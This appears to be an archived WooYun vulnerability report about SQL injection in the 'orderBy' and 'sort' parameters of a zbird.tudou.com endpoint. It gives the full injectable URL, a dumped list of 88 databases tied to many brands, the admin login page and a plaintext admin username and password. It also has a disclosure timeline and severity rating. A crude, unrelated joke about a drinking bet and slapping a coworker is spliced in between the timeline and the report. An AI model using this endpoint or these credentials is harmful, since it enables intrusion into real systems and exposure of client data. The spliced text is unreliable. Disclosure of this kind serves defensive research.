乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-06: 细节已通知厂商并且等待厂商处理中 2014-06-06: 厂商已经确认,细节仅向厂商公开 2014-06-16: 细节向核心白帽子及相关领域专家公开 2014-06-26: 细节向普通白帽子公开 2014-07-06: 细节向实习白帽子公开 2014-07-23: 细节向公众公开
昨天和一个女同事一起喝了点酒,女同事跟我说喝的很高兴,晚上很想靠我肩膀睡,一边说一边靠过来,老子当场就急了,一巴掌扇过去,妈的,说了大干酒三箱,谁倒谁买单,现在反悔想吃霸王餐,作死是吧? 还好我机智没上他的当。
漏洞链接:
http://zbird.tudou.com/zbird/script.do?method=queryList&orderBy=createTime&page=1&size=12&sort=&status=1
和前两个如出一辙其中参数orderBy和sort皆存在注射同样还是88个库
available databases [88][*] 33[*] 7up[*] bacardi[*] banggo[*] bankcomm[*] bebelac[*] biotherm[*] bmk[*] budcountdown[*] budweiser[*] calpis[*] clear[*] cmb[*] cocacola[*] cpic[*] dewars[*] dmpvcard[*] doov[*] dovegofresh[*] ehuatai[*] el[*] event-db1[*] family[*] gdb[*] gelmny[*] gelmny2[*] glico[*] goodyear[*] harbin_beer[*] harbin_live[*] headshoulders[*] hitachi[*] hkss[*] huangjinjiu[*] hylinkad[*] icetea[*] ichangyou[*] information_schema[*] jcyk[*] jnj[*] kagome[*] kfc2010[*] leecity[*] levis[*] levis_roadwear[*] lidushen[*] lime[*] marketing[*] marketing_db[*] max[*] maxwell[*] mensbiore[*] metersbonwevideo[*] mizone[*] mkt_lee_db[*] mm[*] model[*] muscle[*] mysql[*] nikebbn[*] nikewomen[*] pepsi[*] philipsbrand2010[*] philipshaircare[*] rcclchina[*] rejoice[*] rejoicetheater[*] rexona[*] sedrin[*] semir[*] sj[*] spdbccc[*] sprite[*] test[*] tongyi_jasmine[*] toshiba[*] toshiba_25pc[*] toshiba_jianianhua[*] toshiba_sh[*] vinda[*] wahaha[*] xinshuang[*] xkx[*] xyq[*] yulujihua[*] zbird[*] zespri[*] zhidezhencang
当前库zbird后台地址:
http://zbird.tudou.com/zbird/system/login.jsp
账号密码:adminzbird,zbird@tudou
赶快修复吧
你们懂的~
危害等级:高
漏洞Rank:15
确认时间:2014-06-06 19:42
外包项目防不胜防,赞一个简要描述。
暂无